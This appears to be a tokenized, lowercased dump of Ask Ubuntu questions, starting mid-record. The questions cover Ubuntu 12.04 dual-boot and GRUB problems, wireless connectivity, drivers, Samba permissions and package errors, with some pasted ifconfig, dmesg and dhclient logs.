00:13:77 : e6 : c7 : a3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:36 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:9590 errors:0 dropped:0 overruns:0 frame:0 tx packets:9590 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:736608 ( 736.6 kb ) tx bytes:736608 ( 736.6 kb ) wlan0 link encap : ethernet hwaddr 00:24 : d2 : e7:63 : f7 inet addr:10.0.1.74 bcast:10.0.1.255 mask:255.255.255.0 inet6 addr : fe80 : :224 : d2ff : fee7:63f7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23385 errors:0 dropped:0 overruns:0 frame:0 tx packets:23334 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20059347 ( 20.0 mb ) tx bytes:5466444 ( 5.4 mb ) and $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : '' ridderzaal '' mode : managed frequency:2.462 ghz access point : 90:84:0d : f0:14:3f bit rate=1 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=14/70 signal level=-96 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:53 invalid misc:7 missed beacon:0 eth0 no wireless extensions .
178574	opening windows encrypted partition using ubuntu and truecrypt	let 's say your windows system partition is encrypted using truecrypt . then you run ubuntu via a usb stick . i understand that it is possible to mount a truecrypt encrypted partition on linux , but is there anything stopping you from doing this to a truecrypt encrypted windows system partition ?
178577	operating system not found after installing ubuntu in a sony vaio	i just bought a sony vaio svs15115flb that came with windows 7 , after enjoying the pc graphic power for a little , i decided it was time to install ubuntu 12.04 . first , i inserted a usb stick , reboot , press f11 but a message saying that no os was found on the usb , so then i used a live cd . it booted fine and i installed ubuntu , then when it was time to restart the pc , it did n't boot to grub but it went straight to windows and it began an startup error and was looking for a solution , after it was done , it restarted and then it booted again to windows and to the same start up error solution thing . i freaked out , so i booted again the ubuntu live cd , and installed ubuntu over everything , after it installed i rebooted and then a message appeared saying operating system not found , and i have no idea why . so i googled again and found this post on boot partition , i did everything exactly on that post , but it did n't work ( by the way , this was the message ) : the boot files of [ ubuntu 12.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . it appeared the first time , then i did it all again and then it was gone . i rebooted and nothing , the same operating system not found message appeared . so i decided to create a partition for windows , hoping for something , but the message still appears . i really have no idea what to do , but there is something odd , if i insert the usb stick containing ubuntu 11.10 , the message that says that there is no os in the penddrive flashes for a fraction of a second and the boot straight to ubuntu 12.04 without problems ( and booted to windows when i installed it , ignoring ubuntu ) , right now i 'm using it like that , but its pretty annoying . can anyone advise me how to fix this ? i 'm no expert on this kind of things ( boot , grub , recovery and stuff like that ) .
178578	completely disappeared wireless	some days ago after partial upgrade and update my `` ubuntu 12.04 64bit '' wireless disappeared . i googled and tried several solutions such as : 1.bios reset , 2.re-installing all pacgakes related to wireless via synaptic , 3.re-installing bcmwl-kernel-source 4.running this commant via terminal - sudo rfkill unblock all but no any effect . now with rfkill list all i can see that soft block=0 hard block=0 in section wireless lan , so it is ok . in additional drivers section i see disabled broadcom sta wireless driver , and try enable it , but it gives error with long log in file /var/log/jockey.log important fact : my hardware is ok as i have tried to use wifi via livecd and it worked . so the problem is in my ubuntu 12.04 . but what else can i do ? wireless option has been just disappeared from network window . fn+f3 doesn 's do anything , wireless light is always turned off . when i write ifconfig in terminal it does n't show wlan as it showed before . it gives this code : ifconfig bnep0 link encap : ethernet hwaddr 90:00:4e:12:2a:24 inet addr:192.168.44.88 bcast:192.168.44.255 mask:255.255.255.0 inet6 addr : fe80 : :9200:4eff : fe12:2a24/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23059 errors:0 dropped:0 overruns:0 frame:0 tx packets:20570 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:18550526 ( 18.5 mb ) tx bytes:3535892 ( 3.5 mb ) eth0 link encap : ethernet hwaddr 88 : ae:1d:63:30:2d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12685 errors:0 dropped:0 overruns:0 frame:0 tx packets:12685 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:982631 ( 982.6 kb ) tx bytes:982631 ( 982.6 kb ) iwconfig gives this : bnep0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions .
178580	samba share create and delete permissions	i have samba server where every user of domain can write and delete files . but i want to setup following permissions on this share . everyone can create files or folder in this share . all other user have only read and execute access on the folder they should not delete the folder which has been created by other users ( only owner should able to delete this folder )
178586	change notification popup monitor	i have two monitors setup currently however when i get a new notification ( ie popup for new mail , or im ) it fades in on the secondary monitor and fades out on the secondary monitor . is there any way to change it so that the notification alerts appear on the primary not secondary monitor ? i 'm using a ati card if that even makes a difference : )
178589	error opening synaptic manager or update manager	opening update i get this : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/tldm217-tahutek_net-precise.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . ' opening synaptic i get an error occurred . the following detail are provided : e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/tldm217-tahutek_net-precise.list e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . the cause of this is adding the ppa : tldm217/tahutek.net while trying to install apt-fast . removing that ppa did n't remove the errors . it looks like the list of sources in not accessible and this blocks all new actions ( update , purge , etc )
178591	dual-boot computer wo n't boot without external hard drive	i have ubuntu loaded on my external hdd . i tried to unplug the external drive so that this way i could run windows as the default os to boot when the computer turns on , but it gives me an error . i need to know how i can make it so that when my computers boots it stops saying error : no such device : ( a whole bunch of numbers and letters ) then it says grub rescue > _ . if i plug the external hdd in , and i let ubuntu run the boot process , then it gives me a list of os's/ hdd 's to choose from and windows 7 is there . the only problem is that i want windows be my default os , not the other way around . p.s . i have found that i dislike ubuntu because i ca n't even figure out how to install the necessary programs to learn how to start writing ruby on rails . so installing it was a waste of my time , in my opinion . now that i have it on the external hard drive , i will leave it installed though . i just dont want to have to keep that external drive plugged in to my computer all the time . thank you a ton to whoever can help me ! thank you for the detail 'd instructions . i am doing my best to follow you and it makes sense when i read it but , rescatux is not doing what you said it would . none of the options you said would appear are not there . on my screen there is 4 options when mbr run 's none look familiar and when i picked the best possible option based on my educated guesses it said success . i tried to restart my computer and it said please insert windows recovery disc and hit enter . problem being i do n't have the windows recovery disc . i bought my computer from a local computer tec and he loads windows on it for you . i have no time to run my compute over to him as sunday is my only day free . i think that i just wrecked my computer in the process of this attempted fix windows refuses to boot now with or without the hdd . please help this is getting out of hand
178592	compiling 32-bit app on 64-bit , can not find -lx11	i 'm invoking a command like : g++ ... -o '' myapp '' -lx11 ... and getting /usr/bin/ld : can not find -lx11 i 've installed the following packages to support multiarch : ia32-libs , libc6-dev-i386 and g++-multilib but to no avail . there does not appear to be any x11.so in /usr/lib32 , actually there are only 52 libraries in that directory . i 'm under the impression you should manually install libraries , but i 'm at a loss as to what i should check next . any help appreciated .
178593	missing nvidia-settings application	to make a long story short , i seem to have lost my nvidia-settings application . so , when i select settings from the drop down , and then display , i do n't see the configuration screen that i normally associate with nvidia-settings application . i tried to reinstall , and it does n't seem to work : $ sudo nvidia-settings sudo : nvidia-settings : command not found $ sudo apt-get install nvidia-settings reading package lists ... done building dependency tree reading state information ... done nvidia-settings is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 26 not upgraded . $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games anyways , what am i over looking ? also , is there any other nvidia applications i might be missing ? thanks ! edit : as per suggestion i tried to install nvidia-settings , but still not working $ sudo apt-get install nvidia-current reading package lists ... done building dependency tree reading state information ... done nvidia-current is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 26 not upgraded . $ nvidia-settings nvidia-settings : command not found $ sudo nvidia-settings sudo : nvidia-settings : command not found
178598	how are the programs in /bin directory compiled into a non-readable format ?	i 've noticed that most of my commands/programs in the /bin directory are compiled . i wish to duplicate this non-readable code format myself . can someone tell me why and/or how these programs get this way ? [ green stamp bonus ] : is n't there a bash command to print all of the `` human readable '' text from a file ?
178610	unable to install updates	i am trying to install the regular updates on my ubuntu 12.04 but for some reason i keep getting this error . any idea how i can resolve it ?
178612	can lubuntu look exactly like xp ?	i know the differences between linux and windows . i just want to have the visual of xp . can this be done with 12.04 , like it could be with the previous versions of ( l ) ubuntu ?
178614	cant boot into windows after installing ubuntu	i started to use ubuntu in april . i thought it would give me the option whether to boot into ubuntu or windows at each start . but that did n't happen . but i was happy with ubuntu and did n't have time so i did n't try to get dual boot working . now my father has stepped up pressure on me to either have a dual boot working or remove ubuntu . 2 months back i tried repairing windows ( was suggested by a friend ) by using the cd but still i did n't get the dual boot option . recently , after searching the web i found out that a lot of people do use dual boot but i still do n't get what i should do even after searching a lot i have 2 hard drives , the primary has ubuntu 12.04 lts as well as windows 7 . in the secondary hard drive there is another windows 7 installed . all i want is to have the option to boot on of the os in my primary hard disk only . i took help from the people ubuntu servers in xchat . they asked me for the following things : to open gparted and screen shot of it grub.cfg in /boot/grub grub file in /etc/default/grub video of how my computer boots up i am writing the links for these ( according to the numbers up ) http : //www.4shared.com/photo/79wmbzvw/screenshot_from_2012-08-21_174.html ? refurl=d1url http : //paste.ubuntu.com/1159285/ http : //paste.ubuntu.com/1159386/ http : //youtu.be/-jzr6_hajeu [ the thing written in the middle of the video ( when the rectangle box appears ) is - `` atencion '' ( 1st line ) `` 92k/58hz '' ( 2nd line ) `` frequencia fuera de margen '' ( 3rd line ) ] check this clear pic - http : //www.4shared.com/photo/xnhote2q/21082012002.html ? refurl=d1url the helpful people out there came to the conclusion that my monitor is old and unsupported for dual boot . somehow i could n't digest that so please examine things out and help me out . people its even your responsibility to save a ubuntu fan like me .
178615	wi-fi problem on acer aspire one d257 running ubuntu	i finally installed 12.04 on my acer aspire one d257 today but the wi-fi keeps dropping . i turned it on , typed the password but the `` can not connect '' message kept popping up . as i 'm a novice of ubuntu , can anyone help ?
178616	do i need to activate the firewall ? i only use ubuntu for a home desktop use ?	i am a novice at ubuntu ( 12.04 ) . i have it on my netbook which i use mainly for surfing the net , learning python and remote desktop into my work computer . do i need to enable a firewall type software ? if so , what would you suggest , and what are sensible default suggestions ?
178617	how can i ensure i am running the current stock kernel ?	at some point , i installed a new kernel , for no particular purpose but to try . i am having some problems , and would like to ensure that they are not caused by the kernel i installed . how can i generally find out whether i 'm using the newest available official kernel ? if i 'm not , how can i then change ( up- or downgrade ) to the latest official version ? ( i 'm using ubuntu 12.04 , running kernel 3.3.0-030300-generic )
178620	linux got ip from dhcp , but still ca n't connect to wpa2 wifi	here i got a problem . i have a wireless router which is buffalo wcr-hp-gn , and i setting a wifi which use wpa2-psk authentication and the passphrase encrypted by tkip . the password is a 9-letter numbers . my wife has a macbook , and it can connect to the wifi . but my lenovo x200 with ubuntu 12.04 lts can not connect to the wifi . i checked the setting and ip , everything is fine . i can get the ip through dhclient , but when i try to ping the gateway , it does not work . if i try to connect it with wired ethernet cable , and everything is fine , i can ping the gateway . can anyone tell me what 's happened and how to solve it ? thanks ! ! here is the dmesg log while i connect to the wifi . [ 85315.000578 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 85315.616173 ] usb 4-2 : new full-speed usb device number 35 using uhci_hcd [ 85321.433260 ] wlan0 : authenticate with 4c : e6:76:5f:74 : ff ( try 1 ) [ 85321.448196 ] wlan0 : authenticated [ 85321.449359 ] wlan0 : associate with 4c : e6:76:5f:74 : ff ( try 1 ) [ 85321.455113 ] wlan0 : rx assocresp from 4c : e6:76:5f:74 : ff ( capab=0x411 status=0 aid=2 ) [ 85321.455122 ] wlan0 : associated [ 85321.463260 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 85321.464451 ] cfg80211 : calling crda for country : gb [ 85321.475841 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475852 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475859 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475866 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475872 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475879 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475885 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475892 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475898 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475905 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475911 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475918 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475924 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475931 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475937 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475944 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475950 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475957 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475963 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475970 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475976 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 85321.475983 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.475989 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476029 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476035 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476042 ] cfg80211 : 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476049 ] cfg80211 : updating information on frequency 5180 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476058 ] cfg80211 : 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476065 ] cfg80211 : updating information on frequency 5200 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476074 ] cfg80211 : 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476082 ] cfg80211 : updating information on frequency 5220 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476090 ] cfg80211 : 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476098 ] cfg80211 : updating information on frequency 5240 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476107 ] cfg80211 : 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476115 ] cfg80211 : updating information on frequency 5260 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476123 ] cfg80211 : 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476131 ] cfg80211 : updating information on frequency 5280 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476139 ] cfg80211 : 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476147 ] cfg80211 : updating information on frequency 5300 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476155 ] cfg80211 : 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476163 ] cfg80211 : updating information on frequency 5320 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476171 ] cfg80211 : 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a mbi , 2000 mbm ) [ 85321.476179 ] cfg80211 : updating information on frequency 5500 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476187 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476194 ] cfg80211 : updating information on frequency 5520 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476203 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476211 ] cfg80211 : updating information on frequency 5540 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476220 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476227 ] cfg80211 : updating information on frequency 5560 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476236 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476244 ] cfg80211 : updating information on frequency 5580 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476252 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476260 ] cfg80211 : updating information on frequency 5600 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476269 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476276 ] cfg80211 : updating information on frequency 5620 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476285 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476293 ] cfg80211 : updating information on frequency 5640 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476301 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476308 ] cfg80211 : updating information on frequency 5660 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476317 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476324 ] cfg80211 : updating information on frequency 5680 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476334 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476341 ] cfg80211 : updating information on frequency 5700 mhz for a 20 mhz width channel with regulatory rule : [ 85321.476350 ] cfg80211 : 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a mbi , 2700 mbm ) [ 85321.476356 ] cfg80211 : disabling freq 5745 mhz [ 85321.476362 ] cfg80211 : disabling freq 5765 mhz [ 85321.476367 ] cfg80211 : disabling freq 5785 mhz [ 85321.476372 ] cfg80211 : disabling freq 5805 mhz [ 85321.476377 ] cfg80211 : disabling freq 5825 mhz [ 85321.476390 ] cfg80211 : regulatory domain changed to country : gb [ 85321.476396 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 85321.476404 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 85321.476412 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 85321.476419 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 85321.476427 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 85326.605714 ] iwlwifi 0000:03:00.0 : tx aggregation enabled on ra = 4c : e6:76:5f:74 : ff tid = 6 [ 85331.952112 ] wlan0 : no ipv6 routers present this is the dhclient log $ sudo dhclient wlan0 -v internet systems consortium dhcp client 4.1-esv-r4 copyright 2004-2011 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/wlan0/ sending on lpf/wlan0/ sending on socket/fallback dhcprequest of 192.168.11.3 on wlan0 to 255.255.255.255 port 67 dhcpack of 192.168.11.3 from 192.168.11.1 rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service smbd reload since the script you are attempting to invoke has been converted to an upstart job , you may also use the reload ( 8 ) utility , e.g . reload smbd rtnetlink answers : file exists bound to 192.168.11.3 -- renewal in 69538 seconds . the routing table : $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.11.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.11.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 i can not ping through wireless connect : $ ping 192.168.11.1 ping 192.168.11.1 ( 192.168.11.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.11.1 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 2999ms i can ping through wired connect : $ ping 192.168.11.1 ping 192.168.11.1 ( 192.168.11.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.11.1 : icmp_req=1 ttl=64 time=0.988 ms 64 bytes from 192.168.11.1 : icmp_req=2 ttl=64 time=0.811 ms 64 bytes from 192.168.11.1 : icmp_req=3 ttl=64 time=0.820 ms 64 bytes from 192.168.11.1 : icmp_req=4 ttl=64 time=0.860 ms ^c -- - 192.168.11.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2999ms rtt min/avg/max/mdev = 0.811/0.869/0.988/0.079 ms
178635	ubuntu install ca n't find hard drives	i recently got a dell inspiron special edition 7720 computer . i am trying to install ubuntu along side windows . when i use the wubi installer , the installation of ubuntu works as long as i do not boot into windows ; if i boot into windows , when i go back into ubuntu , i am given a variety of error messages which claim to have corrupt or missing kernel/root directory , etc . i have been working with this problem for about a week , and have reinstalled ubuntu many times . so far , i have eliminated all of the following problems : corrupt wubi installation ( downloaded multiple times , used on other systems ) , i have tried using a cd and a flash drive , both of which work on other computers . i know that no program within ubuntu is creating the problem . i know that others have successfully installed ubuntu on a computer with my operating system ( windows 7 sp1 ) . this is a much shortened version of the original question , which has been up for about 5 days , and included a more detailed description of the problem , but left everyone clueless as to the source of this problem . when i spoke with the dell service technician who came over today to replace my keyboard , he suggested that the driver for my hdd was so new that it was not compatible with the current version of ubuntu . his reasoning is as follows : 1 ) during an install from a flash drive or cd , where i am supposed to get the option to wipe my system or create a dual boot , i get a window that asks me to select a hard drive partition , but none are listed . 2 ) this model of computer was made public in june of this year , while ubuntu was released in april adopting this theory , it would seem to me that the wubi install fails after booting into windows because ubuntu can no longer find the files that it needs to load . does this theory seem at all plausible to anyone ? i just want to install ubuntu and have it stay on my computer . i do n't care how i put it there , i just need it to work , so i would truly appreciate any advice or suggestions anyone could give . thanks so much for your time and support ! ! !
178636	how to review the current state of open source vs. closed source graphics drivers ?	how to know whether it 's worth it to replace open source drivers installed by default with proprietary ones . are there any benchmarks ? major known issues summaries . i do n't mean 'at the time of writing this post ' . i mean an up-to-date status on how the drivers compare . this page https : //help.ubuntu.com/community/binarydriverhowto/ certainly does n't do much on the matter , nor it even mentions intel . edit : i 've just learned there is no intel proprietary driver because they made their drivers open source http : //askubuntu.com/a/17395/29347
178638	need to create a partition after installing ubuntu	i have a 1tb hard drive . : p the problem is that i 've already installed ubuntu 12.04 , but i did not make any separate partitions beside the one the operating system is installed on . now i want to make a new such partition . is this possible ?
178639	update mod-wsgi in apache on ubuntu server	i wish to update mod-wsgi to my ubuntu server and i am doing it for the first time . i am not sure how do go about this . can somebody guide me ? i tried sudo a2enmod wsgi but i am getting the following error . error : module mod-wsgi does not exist ! i typed sudo a2enmod and these are the choices i got ! ! it does not contain wsgi . how should i go ahead ?
178647	grub could not find windows 7 after installing ubuntu - raid 0	i just purchased a new computer with two 256 gb ssds configured in raid 0 . it came pre-installed with windows 7 , but i wanted at least one linux distribution installed as well . so , i tried installing ubuntu through the livecd . in the livecd , i first created a few partitions for ubuntu . the first was a 12gb swap and the next , about 88gb formatted ext4 ( gparted would n't let me create an extended partition , so both of there were primary partitions ) . the extra space came from shrinking the windows 7 partition . while installing ubuntu , i selected the master raid controller for the boot loader . after the installer was finished , everything booted fine , but grub did n't have an entry for the windows 7 loader ( even though it had one for the windows 7 recovery loader ) . to fix this , i tried manually editing the /boot/grub/grub.cfg file by adding these lines to the 30_os-prober section : menuentry `` windows 7 ( loader ) ( on /dev/mapper/isw_bhcibcaafd_volume0p5 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd2 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6a92977992974889 drivemap -s ( hd0 ) $ { root } chainloader +1 } after rebooting , grub did n't load and all i got was a blinking cursor in the top left of the screen . so , i tried taking that section out ( through the ubuntu livecd ) and after doing so , i still could n't boot anything . could someone please help me out ? thanks ! here is a copy of my bootinfo summary : http : //paste.ubuntu.com/1159385/ p.s . i have a copy of the grub.cfg if someone needs it for finding a solution
178649	what happens if i disable the ppa of a specific package ?	say i went ahead and disabled the ppa i added to install the latest version of gimp ( 2.8 ) on precise . would that lock the installed version until an updated package is available from the usc or would it cause the package version to be reverted to the one from the official repositories ( 2.6 , i think ? ) . thank you very much in advance
178652	what is the file manager in this screenshot ?	does anyone know the name of that file manager ? is it elementary nautilus ?
178657	how do i find the ppa of a project from its launchpad page ?	im usually searching launchpad for interesting projects but sometimes i just cant find the ppa url . here is an example : marlin on launchpad
178661	do i need swap with new ssd ?	am about to upgrade to new ssd and thinking through partition migration process . will i need swap with an ssd ? i have 8gb ram and an i5 processor .
178662	12.04 : php5-curl not working , not a lamp server	i 've just setup a fresh install of 12.04 server . have everything working nicely , except getting this php5-curl mod to work . i ran apt-get install curl libcurl3 libcurl3-dev php5-curl so i go check phpinfo ( ) ; and there 's no curl section .
178668	strategy need to migrate larger sata drive to smaller ssd ?	my current 12.04 install is on a 750gib sata drive and i would like to smaller 480gib ssd . i only have about 250gib in use right now , along with an 8 gib swap partition . i regularly use clonezilla , but understand that i would need to shrink my current drive first before cloning . i started down the road of doing this in gparted , but was n't sure what to do about the swap partition , as as soon as i went to shrink the main partition , it left a huge hole in the drive . what 's simplest and safest way to do this ? btw , i have a recent clone of the whole drive done using the device to device clonezilla method .
178672	i have excessive tearing on flash video playback when i do n't use compiz , on ubuntu 12.04 i dont have tearing	i have excessive tearing on flash video playback when i do n't use compiz , on ubuntu 12.04 i dont have tearing but i dont want unity 3d cause i got less frames on my games + bad performance ! ! ! ! i tested the tearing with 3 nvidia graphics cards in 3 different pcs the two of them had 1 ) nvidia gts-250 2 ) nvidia 9400 both had tearing on : 1 ) ubuntu 12.04 unity 2d 2 ) xubuntu 3 ) kubuntu 4 ) gnome shell 5 ) cinammon 6 ) mate the strange fact is that when ive tested lubuntu 12.04 32bits i had tearing but after installing the newest drivers from the xswat repository i did n't had tearing anymore ! ! but lubuntu is very elementary desktop its only for the basics dont want it . yes i have the latest graphics drivers ubuntu suggests dont bother asking yes i 've tested download the most updated drivers from xswat repository i found out that ati radeon on their control panel they have an antitearing choice which is working , why nvidia dont have an antitearing choice too ? ? what configuration files are altered to stop tearing ? ? i dont want to use compiz cause for me it sucks it too heavy without any reason at all . gaming with compiz is so so bad less fps less performance , games respond less . my operating system was ubuntu 12.04 64bit , also i tried so many other distros everywhere tearing . when i dont use compiz i can play all games in full resolution full detail when compiz is activated gameplay sucks . i dont care too much about gaming but i hate loosing computer resources for no reason ,
178673	no default or ui configuration directive found	i 've basically got the same problem as everyone else getting this error but renaming the folders and files does n't work because the folder and files has already gotten the names being suggested to switch to . i am installing the os from a usb-drive which i created using the lili usb creator and i know it works because i 've used it on another laptop and it worked perfectly .
